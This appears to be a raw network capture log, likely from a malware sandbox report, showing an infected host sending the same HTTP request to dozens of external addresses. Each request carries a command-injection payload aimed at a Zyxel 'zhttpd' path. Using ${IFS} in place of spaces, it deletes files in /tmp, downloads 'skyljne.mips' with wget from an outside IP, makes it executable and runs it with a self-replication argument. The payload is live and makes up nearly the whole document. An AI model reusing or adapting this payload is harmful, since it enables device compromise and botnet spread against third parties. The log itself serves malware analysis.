                                                Jan 12, 2024 18:24:43.042104959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6301192.168.2.1335168218.240.242.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.042152882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6302192.168.2.1341644107.51.245.44443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.042195082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6303192.168.2.1345248163.215.183.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.042232037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6304192.168.2.1358390160.24.85.6443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.042294979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6305192.168.2.1333362115.226.202.198443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.042331934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6306192.168.2.1341582221.1.87.27443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.042371988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6307192.168.2.1348870207.161.68.239443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.042407990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6308192.168.2.135324242.135.42.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.042462111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6309192.168.2.1351764193.70.208.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.042485952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6310192.168.2.1359726216.216.49.23443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.042530060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6311192.168.2.134353278.234.76.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.042577028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6312192.168.2.13573185.204.173.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.042618036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6313192.168.2.1352178133.111.67.99443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.042649984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6314192.168.2.134913254.149.75.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.042707920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6315192.168.2.134172625.17.91.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.042742968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6316192.168.2.134624618.189.84.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.042778969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6317192.168.2.1354526168.101.222.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.042807102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6318192.168.2.133633850.88.8.106443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.042845011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6319192.168.2.134809279.170.117.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.042871952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6320192.168.2.1334238139.12.18.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.042934895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6321192.168.2.1336664218.186.202.23443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.042962074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6322192.168.2.13362982.141.239.55443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.042996883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6323192.168.2.1344144208.15.154.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.043051004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6324192.168.2.1341164180.64.183.164443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.043071032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6325192.168.2.135118692.5.113.21443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.043119907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6326192.168.2.135293239.200.91.99443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.043170929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6327192.168.2.1343764165.37.57.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.043215036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6328192.168.2.1344832134.27.92.183443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.043243885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6329192.168.2.135233869.156.82.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.043313026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6330192.168.2.1351706211.214.43.99443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.043334007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6331192.168.2.13576969.115.33.114443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.043364048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6332192.168.2.1352138112.68.155.41443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.043401957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6333192.168.2.134382094.6.198.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.043426991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6334192.168.2.1346860198.226.197.56443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.043493032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6335192.168.2.1350630221.23.8.67443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.043523073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6336192.168.2.134326231.189.140.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.043562889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6337192.168.2.1334262133.2.83.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.043608904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6338192.168.2.1343684199.55.18.142443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.043636084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6339192.168.2.133977431.2.46.148443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.043667078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6340192.168.2.1342292142.93.133.236443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.043698072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6341192.168.2.1360370152.48.71.144443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.043719053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6342192.168.2.1340518133.56.1.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.049670935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6343192.168.2.1359844142.7.24.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.049690008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6344192.168.2.1350494179.89.164.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.049746037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6345192.168.2.1344302222.75.94.68443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.049788952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6346192.168.2.1341324120.146.134.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.049803972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6347192.168.2.135661677.234.217.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.049828053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6348192.168.2.134336254.39.251.175443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.049861908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6349192.168.2.1351736210.48.254.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.049917936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6350192.168.2.1343668209.119.154.227443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.049918890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6351192.168.2.1332830190.206.171.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.049958944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6352192.168.2.1357076161.243.211.25443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.049983025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6353192.168.2.134467283.86.133.139443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.050045013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6354192.168.2.1341294206.122.31.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.050101042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6355192.168.2.1333506198.81.138.68443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.050338030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6356192.168.2.1350150105.119.93.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.054615021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6357192.168.2.135503453.207.225.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.054665089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6358192.168.2.1333362144.236.169.142443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.054711103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6359192.168.2.13465345.115.173.62443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.054763079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6360192.168.2.133295275.64.142.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.054819107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6361192.168.2.134234253.176.95.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.054869890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6362192.168.2.134758881.108.40.199443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.054914951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6363192.168.2.1342564136.6.168.124443
                                                TimestampBytes transferredDirectionData
